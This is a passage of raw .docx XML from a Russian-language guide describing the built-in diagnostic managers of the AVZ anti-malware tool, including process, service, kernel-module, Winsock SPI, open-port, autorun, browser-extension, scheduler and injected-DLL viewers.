          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">зируемые форматы можно выбрать на закладке «Настройки», по умолчанию ведется попытка поиска во всех форматах. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Встроенные утилиты</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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Диспетчер процессов</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Для поиска шпионского ПО и троянских программ вручную в программу AVZ встроен собственный диспетчер процессов.</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Вызов диспетчера производится из меню "Сервис \ Диспетчер проце</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сов".</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Диспетчер процессов позволяет:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>отображать список запущенных процессов (список процессов стр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ится различными способами, для Windows NT предусмотрено построение спи</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ка процессов штатными средствами, при помощи Native API, при помощи по</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>системы поиска скрытых процессов);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>отображать список библиотек для каждого из процессов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Диспетчер служб и драйверов</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Для поиска шпионского ПО и троянских программ вручную в программу AVZ встроен собственный диспетчер служб и драйверов (он работает только под NT и последующими системами на ее основе - Windows 2000, XP).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Диспетчер служб и драйверов позволяет:</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rFonts w:eastAsia="Arial Unicode MS"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отображать список служб и драйверов с фильтрацией по типу (служба, драйвер) и статусу (запущен, не запущен);</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Останавливать и запускать службы (или загружать/выгружать дра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вера)</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Особенностью диспетчера служб и драйверов AVZ является возможность использования в его работы системы противодействия  RootKit.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Вызов диспетчера производится из меню "Сервис\Диспетчер служб и драйверов".</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Модули пространства ядра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модулей пространства ядра предназначен для отображения модулей, загруженных в пространство ядра. Запуск менеджера производится из меню "Сервис/Модули пространства ядра".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модулей пространства ядра позволяет:</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 xml:space="preserve"> Просматривать список модулей с сортировкой по имени, базовому адресу или размеру модуля;</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Копировать в карантин модули, не опознанные по базе безопасных AVZ;</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Выполнять дампирование любого модуля для последующего изуч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния;</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модулей пространства ядра связан с автокарантином, исслед</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ванием системы и системой </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>AVZPM</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Менеджер</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Winsock SPI (LSP, NSP, TSP)</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SPI/LSP позволяет просматривать списки поставщиков службы имен (NSP) и транспорта (TSP). Каждый поставщик может быть удален польз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вателем вручную.</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 окне менеджера Winsock SPI размещено три закладки:</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lastRenderedPageBreak/>
        <w:t>Поставщики пространства имен (NSP - Name Service Provider). Отображает список библиотек, зарегистрированных в качестве NPS поставщ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ков. Для каждой библиотеки отображается название поставщика, статус и по</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>л</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ное имя исполняемого файла. Файла могут быть скопированы в карантин, включены или отключены или удалены при помощи кнопок на панели под списком п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ставщиков;</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Поставщики транспортных протоколов. Данная закладка аналоги</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>на предыдущей, но для  поставщиков транспортных протоколов предусмотрена только операция удаления;</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Поиск ошибок. Данная закладка содержит список ошибок в настройках LSP, обнаруженных в ходе их изучения. На данной закладке пред</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>смотрена кнопка "Автоматическое исправление найденных ошибок", которая запускает процесс автоматического устранения ошибок в настройках.</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Открытые порты TCP/UDP</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 AVZ встроен менеджер, позволяющий просматривать:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:vanish/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Открытые порты TCP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Активные соединения по протоколу TCP/IP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Открытые порты UDP.</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Для каждого открытого порта (или соединения) выводится имя исполн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>емого файла, но эта возможность действует только в Windows XP и Windows 2003. Кроме того, у AVZ имеется особая база с описанием назначения наиболее распространенных портов и степени их опасности (опасными считаются порты, используемые сетевыми вирусами, троянскими и Backdoor программами). О</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>крытый порт, который используется опасной программой, выделяется красным цветом и в описании указано, какие вредоносные программы могут использ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вать данный порт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Кроме возможности просмотра списка открытых портов в AVZ встроена автоматическая проверка, выполняемая в ходе сканирования системы. В ходе данной проверки производится построение списка открытых портов TCP и UDP, после чего AVZ сопоставляет этот список с базой портов, применяемых троянскими программами и сетевыми вирусами. При обнаружении совпадений в протокол выводятся предупреждения с указанием номера порта, его описания и имени программы (имя программы выводится только в XP, Windows 2003).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Менеджер автозапуска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автозапуска отображает список программ и библиотек, загр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>жаемых в ходе загрузки системы. Менеджер позволяет:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отображать список автозапускаемых программ с указанием метода запуска;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Временно отключать элементы автозапуска;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удалять элементы автозапуска;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Копировать файлы в карантин;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>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Анализатор менеджера автозапуска подключен к исследованию системы и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>автокарантину.</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Менеджер расширений IE</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расширений IE отображает список подключенных к Internet Explorer модулей расширения. Модули расширения - это BHO и различные п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нели.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список модулей расширения IE;</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Временно отключать расширения;</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Удалять модули расширения (при этом исполняемый файл не уд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ляется - удаляется только регистрационная информация в реестре);</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менеджера расширений IE подключен к исследованию сист</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мы и автокарантину.</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Менеджер расширений проводника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Менеджер расширений проводника отображает список подключенных к Explorer модулей расширения.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список модулей расширения проводника;</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Временно отключать расширения;</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Удалять модули расширения (при этом исполняемый файл не уд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ляется - удаляется только регистрационная информация в реестре);</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менеджера расширений Explorer подключен к исследованию системы и автокарантину.</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Менеджер апплетов панели управления (CPL)</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Менеджер апплетов панели управления отображает список CPL файлов.  CPL файл - это динамическая библиотека, экспортирующая определенные функции для взаимодействия с панелью управления.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апплетов панели управления;</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Временно отключать любой из апплетов;</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 xml:space="preserve">Удалять апплеты (при этом </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>удаляется</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняемый CPL файл);</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апплетов панели управления подключен к исследованию с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемы и автокарантину.</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Менеджер расширений системы печати</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расширений проводника отображает список расширений с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">стемы печати.  </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Известно две разновидности расширений - мониторы печати и провайдеры.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список модулей расширений системы печати;</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Временно отключать расширения</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Удалять модули расширения (при этом исполняемый файл не уд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ляется - удаляется только регистрационная информация в реестре);</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менеджера расширений печати подключен к исследованию системы и автокарантину.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Менеджер планировщика заданий (Task Scheduler)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планировщика заданий отображает задания, поставленные в очередь планировщиком задач или командой AT. Анализ заданий полезен ввиду того, что некоторые SpyWare и троянские программы используют план</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ровщик для своего запуска или для запуска дроппера, который восстанавливает удаленный компоненты SpyWare.</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список заданий планировщика;</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Удалять задания;</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менеджера планировщика заданий подключен к исследов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нию системы и автокарантину.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Менеджер внедренных dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Менеджер внедренных DLL позволяет просмотреть список всех пост</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ронних DLL, внедренных в процесс AVZ. Для каждой DLL выводится дополн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тельная информация (в частности, определенная нейросетью степень похож</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сти на типовой перехватчик). Цветовая раскраска таблицы стандартна для AVZ - опознанные по базе безопасных библиотеки выделяются зеленым цветом.</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Основание назначение анализатора - поиск причины сбоев в работе пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
